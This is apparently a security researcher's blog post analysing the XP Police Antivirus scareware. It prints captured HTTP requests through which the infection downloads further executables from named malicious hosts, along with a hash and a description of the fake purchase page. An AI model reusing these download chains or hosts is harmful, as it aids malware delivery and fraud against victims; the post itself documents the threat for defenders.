Aggressive strategy of XP Police Antivirus infection. Second part

From the time that the infection of XP Police Antivirus, you will begin to display on screen a series of false alerts on emerging infections, among others.

But in a fully transparent manner, will produce a series of actions to complete the work of scareware. Through listening to the traffic, we see the unloading of the following components:

GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Download setup.dat isn't a data file but a compressed file that saves a copy of the other files that are uncompressed in C:\Program Files\XPPoliceAntivirus.

GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Download sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) which is used to compress the malware runtime try to avoid detection by antivirus programs.

GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:47:46 GMT
Content-Type: application/octet-stream
Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT
Accept-Ranges: bytes
Content-Length: 2746314
Connection: Keep-Alive
Age: 0

MZ......................@...............................................!..L.!This program cannot be run in DOS
mode.

GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:51:15 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT
ETag: "3a58001-1-bd70a300"
Accept-Ranges: bytes
Content-Length: 1
Connection: Keep-Alive
Age: 0

2

GET /js/window.js HTTP/1.1
Accept: */*
Referer: http://www.xp-police-09.com/installed.php?id=108
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

JavaScript windows.js displayed on screen pop-up window with the caption Thank you for Installation!

GET /buy.php?id=108 HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

This is the page to purchase the scareware from where sensitive information and financial requests of the victim. It's a scam/phishing.

The maneuvers used by malicious code are becoming more aggressive and effective in their actions because, as could be seen, the installer is downloaded in the first instance, is only part of the puzzle from which the other gets scareware pieces.

Related Information
Aggressive strategy of XP Police Antivirus infection
Campaign spreading XP Antivirus Police through Visual Social Engineering

# Jorge Mieres